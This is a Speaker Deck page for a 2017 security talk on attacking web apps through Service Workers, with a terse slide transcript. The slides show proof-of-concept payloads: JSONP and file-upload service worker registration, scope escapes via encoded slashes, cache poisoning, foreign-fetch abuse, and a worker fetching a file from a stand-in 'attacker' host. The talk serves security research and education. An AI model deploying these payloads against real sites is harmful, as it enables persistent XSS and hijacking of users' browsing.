Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
攻撃者視点で見る Service Worker / PWA Study SW
Search
Masato Kinugawa
September 14, 2017
Technology
20
25k
攻撃者視点で見る Service Worker / PWA Study SW
PWA Study(
https://web-study.connpass.com/event/65267/
) で発表した資料です。
Masato Kinugawa
September 14, 2017
Tweet
Share
More Decks by Masato Kinugawa
See All by Masato Kinugawa
注目したいクライアントサイドの脆弱性2選/ Security.Tokyo #3
masatokinugawa
8
2.1k
バグハンティングのすゝめ / P3NFEST
masatokinugawa
5
1.4k
Pwn2OwnでMicrosoft Teamsをハッキングして2000万円を獲得した方法/ Shibuya.XSS techtalk #12
masatokinugawa
13
16k
How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
masatokinugawa
0
16k
JSでDoSる/ Shibuya.XSS techtalk #11
masatokinugawa
21
6.4k
Electron: Abusing the lack of context isolation - CureCon(en)
masatokinugawa
5
90k
Electron: Context Isolationの欠如を利用した任意コード実行 / Electron: Abusing the lack of context isolation - CureCon(ja)
masatokinugawa
9
22k
バグハンターが見てきたBug Bountyの7年 / LINE Developer Meetup #34 Security Bug Bounty
masatokinugawa
18
12k
5文字で書くJavaScript/ Shibuya.XSS techtalk #10
masatokinugawa
35
19k
Other Decks in Technology
See All in Technology
Oracle Database で機械学習を始めよう! Oracle Machine Learning
oracle4engineer
PRO
1
140
サービス成長と共に肥大化するモノレポ、長くなるCI時間 / As services grow, monorepos get bigger and CI time gets longer
kohbis
5
2.1k
オーティファイ会社紹介資料 / Autify Company Deck
autifyhq
7
100k
継続的テストモデルを実現するためにスリーアミーゴスを用いた10Xでのシフトレフトの事例
nihonbuson
3
260
.NETの非同期戦略とUnityとの相互運用
neuecc
2
2.4k
エバンジェリスト活動を7年やってきて見えてきた、コミュニティとエバンジェリストの関係
soracom
PRO
1
200
ビジネスとコード品質の接合点 そしてコード品質がそこに及ぼす影響 / The Intersections of Business and Engineering, and The Impact of Code Quality There
mtx2s
11
1.1k
KubeCon EU 2024 : Knative Maintainers Session
salaboy
0
380
データマネジメントを支える武器としてのメタデータ管理
10xinc
2
980
家族アルバム みてねで直面してきた技術的負債 / MIXI KAG 2024
isaoshimizu
17
7.7k
LLM + RAG を使った SORACOM Support Bot の裏側の歴史
soracom
PRO
1
650
エンジニア候補者向け資料2024.03.28.pdf
macloud
0
2.9k
Featured
See All Featured
The Pragmatic Product Professional
lauravandoore
24
5.7k
Web Components: a chance to create the future
zenorocha
304
41k
JazzCon 2018 Closing Keynote - Leadership for the Reluctant Leader
reverentgeek
178
11k
Git: the NoSQL Database
bkeepers
PRO
421
63k
From Idea to $5000 a Month in 5 Months
shpigford
376
45k
Building Applications with DynamoDB
mza
88
5.6k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
24
2.2k
Building Effective Engineering Teams - LeadDev
addyosmani
25
1.8k
Large-scale JavaScript Application Architecture
addyosmani
501
110k
YesSQL, Process and Tooling at Scale
rocio
160
13k
Embracing the Ebb and Flow
colly
78
4.1k
The Brand Is Dead. Long Live the Brand.
mthomps
48
22k
Transcript
None
None
• •
• • • <script> navigator.serviceWorker.register("/sw.js") </script>
• • •
• • https://html5experts.jp/kyo_ago/5153/ https://speakerdeck.com/filedescriptor/exploiting-the-unexploitable-with-lesser-known-browser-tricks?slide=23
None
HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 [...] alert(1)//({});
<script> navigator.serviceWorker.register("/jsonp?callback=[SW_HERE]//"); </script> HTTP/1.1 200 OK Content-Type: text/javascript; charset=UTF-8 [...]
onfetch=event=>console.log('fetch')//({});
<script> var formData = new FormData(); formData.append("csrf_token", "secret"); var sw
= "/* [SW_CODE] */"; var blob = new Blob([sw], { type: "text/javascript"}); formData.append("file", blob, "sw.js"); fetch("/upload", {method: "POST", body: formData}) .then(/* Register SW */); </script>
• •
• • onfetch=e=>{ body = '<script>alert(1)</script>'; init = {headers: {'content-type':
'text/html'}}; e.respondWith(new Response(body,init)); }
• • • <script> navigator.serviceWorker.register("/sw.js", {scope: "/"}) </script>
• • "/assets/js/sw.js", {scope: "https://other.example.com/"} "/assets/js/sw.js", {scope: "/assets/"} "/assets/js/sw.js", {scope:
"/assets/css/"} "/assets/js/sw.js", {scope: "/assets/js/"} "/assets/js/sw.js", {scope: "/assets/js/sub/"}
HTTP/1.1 200 OK content-type: text/javascript service-worker-allowed: / [...]
https://example.com/api/jsonp https://example.com/api%2Fjsonp
❝ ❞
https://example.com/out-of-scope/ https://example.com/foo/..%2Fout-of-scope%2F
None
• • •
onfetch=e=>{ e.respondWith(fetch("//attacker/poc.swf")) } •
<?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="example.jp" /> </cross-domain-policy> https://github.com/cure53/XSSChallengeWiki/wiki/XSSMas-Challenge-2016
❝ ❞
<script src="//example.com/socialbutton.js"></script>
self.addEventListener('install', e => { e.registerForeignFetch({ scopes: ['/'], origins: ['*']// });
}); onforeignfetch = e => { e.respondWith(fetch(e.request).then(res => ({ response: new Response('alert(1)')// }))) }
• •
onfetch = event => { event.respondWith( caches.open("v1").then(function(cache) { return cache.match(event.request).then(function(response)
{ if (response) { return response;// } else { return fetch(event.request.clone()).then(function(response) { cache.put(event.request, response.clone());// return response; }); } }) }) ); };
<script> caches.open("v1").then(function(cache){ content = "<script>alert(1)</script>"; init = {headers: {"content-type": "text/html"}};
request = new Request("poison.html"); response = new Response(content, init); cache.put(request, response); }) </script>
<script> document.write(localStorage.getItem('name')); </script>
• • •
• • HTTP/1.1 200 OK Content-Type:text/html Clear-Site-Data: "storage"
GET https://example.com/sw.js HTTP/1.1 Host: example.com Connection: keep-alive Pragma: no-cache Cache-Control:
no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Accept: */* Service-Worker: script Referer: https://example.com/ Accept-Encoding: gzip, deflate, br Accept-Language: ja,en;q=0.8,en-US;q=0.6
• •
None
None